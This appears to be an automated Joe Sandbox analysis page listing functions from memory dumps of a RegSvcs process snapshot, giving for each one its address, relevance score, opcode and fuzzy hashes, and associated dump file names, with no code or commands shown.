Opcode ID: 7b5a5452d910cf22bfe3c5b2283d06f6bfff9faac53a5b176e04a9fc48b8659b
Instruction ID: 5052a2fbc3531a178b83782a97a87d1e4e77d6a5aa5618c1ae7ec5623f9f5848
Opcode Fuzzy Hash: 7b5a5452d910cf22bfe3c5b2283d06f6bfff9faac53a5b176e04a9fc48b8659b
Instruction Fuzzy Hash: 61117932241642EFDB25AF19CD91F16BBB8FF94B44F2400A9EA059B661C235E901CA90

Function 015D6259 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d02e4ec3d34cd1ad6b7de9ce64e45ab1e1079587767e752a96318368b87afec9
Instruction ID: 0a16a94ad539b57f8229b0af460af6997631731dfb1d836d9ffdff566688168c
Opcode Fuzzy Hash: d02e4ec3d34cd1ad6b7de9ce64e45ab1e1079587767e752a96318368b87afec9
Instruction Fuzzy Hash: 7911A070541229ABDB35EB68CC51FE973B5BF04710F5441D8A319AA1E0D7709E81CF88

Function 01606DA0 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b57f4f4dfdc694a89b6360ad5c5c3f3bcd20a529a5f65e9c4b2c9bdc8e4456f
Instruction ID: c3dec66d0f7d6d1c769137ea9d47adb37f6e87c001fcedb34ab6edf754adb0b5
Opcode Fuzzy Hash: 7b57f4f4dfdc694a89b6360ad5c5c3f3bcd20a529a5f65e9c4b2c9bdc8e4456f
Instruction Fuzzy Hash: 7F01287260831667EF2E9B59DC04B9B7FA4EB80B50F044059EA065F2C0DB74DCA1C3E0

Function 01656050 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c95ad8b01e7f87ff64b4fd7accad06dcd6e6eeb76924b0e585ecc89c42225012
Instruction ID: 6b2d5c96cb2ae6be4d76ed13cd793093cfc1c6ae503a418b135dbd23c842e071
Opcode Fuzzy Hash: c95ad8b01e7f87ff64b4fd7accad06dcd6e6eeb76924b0e585ecc89c42225012
Instruction Fuzzy Hash: E4112973900119ABCB16DB94CC84DEFBBBDFF48258F044166E906E7211EA34EA55CBE0

Function 015D208A Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
Instruction ID: 942a0c7814b007f28e6b15b621e44490cc9c7fe937b6ff55811c1b7fb6a5360d
Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
Instruction Fuzzy Hash: D30124326011118BEF258A2DDC80B96B7BBBFC4700F5945A9ED058F346DB72CC81CB90

Function 0165C810 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 753c38c908451cce9801f1de94912d72ea224f942eeb6ec3b3166a50b0e0415f
Instruction ID: 29ab4188de2bb73d4567d62d2ccac30896684c729f4f00a6dd66832939e3a979
Opcode Fuzzy Hash: 753c38c908451cce9801f1de94912d72ea224f942eeb6ec3b3166a50b0e0415f
Instruction Fuzzy Hash: 3E11E8B1E002099FCB04DFA9D945AAEBBF8FF58350F14406AA905E7355D674EA01CBA4

Function 015CC020 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
Instruction ID: 161353a1e1ff56e679905f361b25a7b15d9c1bf1926413860b185df58d807c5b
Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
Instruction Fuzzy Hash: 4B01B532100B459FEB229AA9CD00AAB77E9FFC5650F05881DEA469B640DAB0E402CB50

Function 016120F0 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0077b85146e7e57b8d233af5cf410342bb2a4a01da6370673f740de37e26f586
Instruction ID: 21f734cdeaa955819e6e7c7e65f800c787f589eef68c5452b070568832d10449
Opcode Fuzzy Hash: 0077b85146e7e57b8d233af5cf410342bb2a4a01da6370673f740de37e26f586
Instruction Fuzzy Hash: 1C116D75A0024DEFCB05EFA4CD51BAE7BBAFB44384F104059EA069B254DB35AE11CB90

Function 0160E5CF Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f02498df53585860c49a86fb693516fe1423166b3a6a658f39dcca70570ce059
Instruction ID: c6b462627e97f33b1956c1f201254be3ee8ec60b54171de5f1ec96c5483e1400
Opcode Fuzzy Hash: f02498df53585860c49a86fb693516fe1423166b3a6a658f39dcca70570ce059
Instruction Fuzzy Hash: 9B01D471A11A027BD315BB29CD44E13B7ECFFD9654B000629B1098B650DB64EC11C6A0

Function 0165C460 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d94f1b2a2565603ed8107e4fb382ee928fac749bfd83cdfb2e769756809b790
Instruction ID: 7b18e096609d34f8563133c3c91e65409ca17df5f282de37a3c32d50f3f1f908
Opcode Fuzzy Hash: 1d94f1b2a2565603ed8107e4fb382ee928fac749bfd83cdfb2e769756809b790
Instruction Fuzzy Hash: ED113975A01249ABDB15EF68CC44EAE7BBAEB48344F004059ED0197340DB35A911CB90

Function 0165C97C Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ab9effc0f27d6512f456f63e2370b422436c25c25c9ec5ef3a11045cdce6548
Instruction ID: 0a1adf903b6e7b91d34a264507fe580b6335d112068924f62140ff9703f416bf
Opcode Fuzzy Hash: 7ab9effc0f27d6512f456f63e2370b422436c25c25c9ec5ef3a11045cdce6548
Instruction Fuzzy Hash: 411179B16083099FC700DF69C842A5BBBF8FF98350F00451EB998D7390E630E900CB96

Function 0165CA11 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90bb250dde5e93ea0babd786ec3b94f42d8446ebe841b76c511870133eebf1f2
Instruction ID: cc902b153a0213d69106cf3c5ef205d0e5cdec01be95cd0849ccbbde119837d4
Opcode Fuzzy Hash: 90bb250dde5e93ea0babd786ec3b94f42d8446ebe841b76c511870133eebf1f2
Instruction Fuzzy Hash: FB118BB16083099FC300DF69C841A5BBBE8FF99350F00851EF998D73A4E630E900CB96

Function 01632045 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d070d009cec517deda217c49c1204ab4902f8b4741d5b4904d4d9fbd3867cc99
Instruction ID: ac57d3a6a6ee40abb4ff31966bb197d7763cfb356a99c1059de89f61d4b2cd39
Opcode Fuzzy Hash: d070d009cec517deda217c49c1204ab4902f8b4741d5b4904d4d9fbd3867cc99
Instruction Fuzzy Hash: AF015E756083119BD761CF19C840A2AF7E2FBD8714F44496DFA8597361D371EC48CB51

Function 015EE016 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
Instruction ID: 4d82955e4f3c70fc5b5e6d72cf1787c1a10a6736efd7087b70f086689d5375f4
Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
Instruction Fuzzy Hash: 48017C326109949FE32A861DCA48F2A7BD8FB84754F0904A1F905CF691D728DD40C621

Function 015C826B Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 477c30884b0b0ae406a4d6c879bbd387137359049304960acce8e20ca096bc29
Instruction ID: 304083db82bcad8e3e8a6c545494f1d85a9f90434223315307d551dc387b030d
Opcode Fuzzy Hash: 477c30884b0b0ae406a4d6c879bbd387137359049304960acce8e20ca096bc29
Instruction Fuzzy Hash: 4C01D431610905DFD714DFA9DC14ABE77EAFF80A10F09406D9D01AB240DE60D801C690

Function 01654C0F Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90509a78eec59345403bc1828c185d0b543592e92a28decf080c43e6d8d8a73f
Instruction ID: 2cd65c3b94040ddc5496d6346a7eeffbe38345959c1a20937dc9c48fe3329d4d
Opcode Fuzzy Hash: 90509a78eec59345403bc1828c185d0b543592e92a28decf080c43e6d8d8a73f
Instruction Fuzzy Hash: CF018472B103069BDB219F9DDDC4B69BBFCABC4B50F100069EA059B301EBB0DD448764

Function 015D2582 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6421cdc14e2b8e80a284ae01100640e8e1930e05113928d004992fd6c5759a30
Instruction ID: a1020cb8c9786dfcd8577c6b78e63e97d749fede40b6e337b7f349571f572eed
Opcode Fuzzy Hash: 6421cdc14e2b8e80a284ae01100640e8e1930e05113928d004992fd6c5759a30
Instruction Fuzzy Hash: D1F0D132A41B21ABC7319B5A8C44F57BAA9FBC4A90F004428A60A9B640DA30ED01CBA0

Function 015FC073 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 186ba59089a022de0fe75da19e9f9a25daa67385135c4d0e061e5f5da52e9a9e
Instruction ID: cbbbb6d06c6c8a8b2c447d87337c8133a23c64230258a2f8e1968adf129c7487
Opcode Fuzzy Hash: 186ba59089a022de0fe75da19e9f9a25daa67385135c4d0e061e5f5da52e9a9e
Instruction Fuzzy Hash: 6BF0C2B3A00615ABD324DF4DDC40E6BFBEEEBD1A80F04812CA605CB220EA31DD05CB90

Function 0160CA6F Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
Instruction ID: 8bf1156d4d88601238378eaa4206c4c08abe03d350743116464c9879fa45ca83
Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
Instruction Fuzzy Hash: 6D01D1326016859BD327976DCD09F5ABBDDEF81754F0841A5FE048F7A1D77AC841C220

Function 016520DE Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 802faa4995e4d96bbf88bad67889512a79ed73a15febc144703c73ba099c5f93
Instruction ID: d4d61b9c9c5626ce36b80ee66afb12afbb4c36a89fdb361351aae689ffcec541
Opcode Fuzzy Hash: 802faa4995e4d96bbf88bad67889512a79ed73a15febc144703c73ba099c5f93
Instruction Fuzzy Hash: 1FF0FF34640308AFE720E64CDC96FEA3B68FB40B44F14001CFB006B285D2A0A9508AA4

Function 016563C0 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
